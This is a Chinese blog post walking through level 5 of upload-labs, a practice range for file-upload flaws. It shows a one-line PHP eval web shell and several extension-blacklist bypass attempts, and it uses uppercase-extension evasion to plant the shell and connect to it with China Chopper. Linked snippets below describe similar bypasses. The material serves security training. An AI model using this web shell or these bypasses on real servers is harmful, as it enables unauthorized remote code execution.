5.upload-labs—Pass05

最新推荐文章于 2024-08-14 16:30:01 发布
最新推荐文章于 2024-08-14 16:30:01 发布
阅读量3k 收藏
点赞数 1
分类专栏: # 1.upload-labs 文章标签: upload-labs5 文件上传之大小写混淆绕过
clqwsn
本文链接:https://blog.csdn.net/qq_45555226/article/details/104847059
版权

一、Pass05

1、上传一个shell.php

shell.php内容为:<?php @eval($_POST['123']);?>

//结果如下图所示,提示我们此文件不允许上传
在这里插入图片描述
2、扩展名黑名单绕过方法:
①、上传,shell.php.jpg
//尝试是否存在apache的解析漏洞
//结果,不能解析

②、上传.htaccess
//尝试,是否被过滤
//结果,被过滤

③、打开代理,启动BP,上传shell.php,拦截,在文件名的收尾去加点
//被过滤

④、打开代理,启动BP,上传shell.php,拦截,在文件名的收尾加空格
//被过滤

⑤、打开代理,启动BP,上传shell.php,拦截,在文件名的收尾加::$DATA
//被过滤

⑥、打开代理,启动BP,上传shell.php,对文件名的扩展名,大小写绕过
//形如:shell.PHP或者shell.PHp

如下图所示,上传成功,且上传点为:http://192.168.97.139/upload-labs/upload/
在这里插入图片描述
3、菜刀连接http://192.168.97.139/upload-labs/upload/shell.PHP即可

在这里插入图片描述

qwsn
关注
专栏目录
Upload-Labs-Pass-05
龙狼刺的博客
04-20 288
一、相关知识 1、大小写绕过原理: Windows系统下,对于文件名中的大小写不敏感。例如:test.php和TeSt.PHP是一样的。 Linux系统下,对于文件名中的大小写敏感。例如:test.php和TeSt.PHP是不一样的。 二、环境搭配 攻击机: kali IP: 192.168.0.112 靶机: Windows2008 IP: 192.168.0.130:9006 三、文件上传 1、制作一句话木马 命令:<?php @eval
upload-labs(1-6关)
weixin_44351992的博客
11-10 2745
前6关题目都只能显示到这样,不逐个演示了。 1.pass-01 先写个最简单的webshell 上传时发现,不可以上传且burp没有抓到包 判断其通过前端js判断文件后缀,web开发工具里禁用JavaScript 上传成功。 2.pass-02 burp抓包发现,通过HTTP content-type 限制了上传文件类型 检测到了我们上传的格式为.php 我们将其修改为要求的image/jpeg 上传成功。 3.pass-03 ...
upload-labs(Pass-01 ~ Pass-05)
最新发布
m0_64849639的博客
08-14 998
upload-labs
upload-labs:pass-05
羽的博客
07-07 242
类型上还是一个后端黑名单绕过。 这里不一样的是又多加了一个.htaccess,也就是pass-04的方法不能用了。 不过还有一个配置文件: .user.ini文件。 .user.ini相当于一个用户自定义的php.ini。 先上传一个以auto_prepend_file=hacker.gif为内容的.user.ini文件,.user.ini文件里的意思是:所有的php文件都自动包含hacker.gif文件。 然后再传一个内容为php一句话的脚本,命名为hacker.gif, 这样,hack...
upload-labs】————5、Pass-04
Fly_鹏程万里
08-15 421
闯关界面 首先上传一个shell.php文件看看对于上传文件的检测是前端检测还是后端检测: 之后我们来查看一下源代码: 从上面可以看到基本上过滤了所有的常见的后缀名,而且先全部进行小写转换,对文件后缀名进行拆分,之后来进行检测,看起来好像没有戏了,那么这种情况下怎么办呢?不妨试试.htaccess攻击看看: 首先我们上传一个.htaccess文件,文件内容如下: ...
upload-labs】————6、Pass-05
Fly_鹏程万里
08-15 331
闯关页面 首先判断是前端检测还是后端检测: 确定为后端检查 之后查看一下源代码: 可以从上面看到,这里和之前不同的地方就是增加的.htaccess后缀文件的检测,但是这里却少理一个大小写检测,所以我们可以通大小写绕过检测: 之后再浏览器中访问看看: 很多人可能会想,你这里演示的都是上传一个php文件,之后输出phpinfo()就完了,真实环境中能否真的ge...
upload-labs通关(Pass01-Pass05)
m0_46467017的博客
08-15 1817
我们在数据包中把后缀名改为.php. .,首先他发现有一个点,这时会把他去掉,又发现有一个空格,也会把它去掉,我们这时还有一个点,也就是.php. 由于他只是验证一次,所以不会在去掉我们的点。我们在数据包中把后缀名改为.php. .,首先他发现有一个点,这时会把他去掉,又发现有一个空格,也会把它去掉,我们这时还有一个点,也就是.php. 由于他只是验证一次,所以不会在去掉我们的点。本关也有两种绕过方法:第一种是上传php文件,改Content-Type,第二种是上次合法后缀文件,改文件改后缀。...
Upload-Labs-Pass-09
龙狼刺的博客
04-23 231
目录 一、相关知识 1、路径拼接绕过原理 二、环境搭配 三、文件上传 1、创建webshell 2、修改文件名 3、文件上传 四、Weevely连接 一、相关知识 1、路径拼接绕过原理 在没有对上传文件进行重命名的情况下,用户可以自定义文件名并在服务器中上传新建,就会造成对应的绕过黑名单。 二、环境搭配 攻击机: kali IP: 192.168.0.112 靶机: Windows2008 IP: 192.168.0.130...
upload-labs19-20以及总结1
08-08
5. **00截断**:在某些环境中,文件名中包含"00"字节可能导致路径截断,使得恶意文件可以以不同的方式被执行。在Pass19中,可以通过在`save_name`参数中添加"00"来尝试绕过黑名单,但这可能需要特定环境支持。 6. *...
Upload-Labs-Pass-08
龙狼刺的博客
04-21 1185
一、相关知识 1、特殊符号绕过原理: Windows系统下,如果上传文件的文件名为test.php::$DATA,则会在服务器中生成一个为test.php文件,其中内容和所上传的文件内容相同,并被解析。 二、环境搭配 攻击机: kali IP: 192.168.0.112 靶机: Windows2008 IP: 192.168.0.130:9006 三、文件上传 1、创建webshell 格式:weevely generate 密码 ...
upload-labs-0.1.zip
12-21
1)推荐使用Windows系统搭建(注:使用docker pull c0ny1/upload-labs的镜像在Pass-03会遇到问题,初步判断是该镜像内的php.conf文件配置错误导致)。 2)下载地址 ...
Upload LABS Pass-5
热门推荐
wangyuxiang946的博客
07-02 1万+
uploadlabs5upload labs 第五关在后端使用了黑名单 , 并过滤了空格,点 , 但未过滤大小写 , 我们修改文件后缀大小写绕过黑名单
Upload-labs Pass-05 Pass-06 Pass-07 Pass-08 黑名单特殊绕过
baynk的博客
11-03 1051
Pass-05 大小写绕过 和上一把一样的报错,burpsuite改个名查看一下。 这里有重命名,.htaccess没法用了。之间把解析漏洞给关掉了,作者也不会重复玩的,所以这里就直接看源码挖洞吧。 函数解析 $is_upload = false; $msg = null; if (isset($_POST['submit'])) { if (file_exists(UPLOAD_PA...
upload-labs-5
Lu__xiao的博客
02-25 469
登陆第五关 查看提示、源代码 从代码中可以看出删除文件名末尾的点,去除字符串,首尾去空并且它没有使用循环验证 上传 抓包 发送到repeater 在文件名后添加. . 当它验证首先去掉一个点再去掉空格,因为没有循环只验证一次所以我们还有一个点,这时我们就上传成功了 ...
upload-labs通关(Pass-01~Pass-05)
箭雨镜屋
10-07 2435
开始之前,准备好burpsuite,浏览器配置好代理。 Pass-01 这关要求上传一个webshell,我选择了一个叫sh.php的文件并点击上传之后,跳出了一个弹框,提示当前文件类型不是允许上传的文件类型。 在burpsuite上proxy模块的http history中看了一下,并没有上传文件相关的报文,说明弹框时文件格式没有经过后端校验。 查看网页源代码,发现文件类型和弹框是由前端JS代码校验的。 这关至少有两种方法:浏览器disable JS,或者上传合法格式的文件,burp抓包
文件上传--Upload-labs--Pass05--大小写绕过
2302_79800344的博客
02-18 468
大小写绕过
文件上传漏洞靶场upload-labs学习(pass1-pass5
AFCC_的博客(Web_Dog)
02-18 5307
0x00 upload-labs简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。在2019年11月添加新的pass-05后关卡总数为21关。
upload-master-pass5
diemozao8175的博客
08-17 244
第五关 把大部分的后缀名都过滤了,但是忽略了大小写 于是采用大小写绕过 PhP PHp phP 都可以进行绕过 转载于:https://www.cnblogs.com/gaonuoqi/p/11369358.html...
upload-labs pass6
07-28
- *1* [upload-labs靶场-Pass-06关-思路以及过程](https://blog.csdn.net/weixin_44257023/article/details/122506927)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qwsn

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值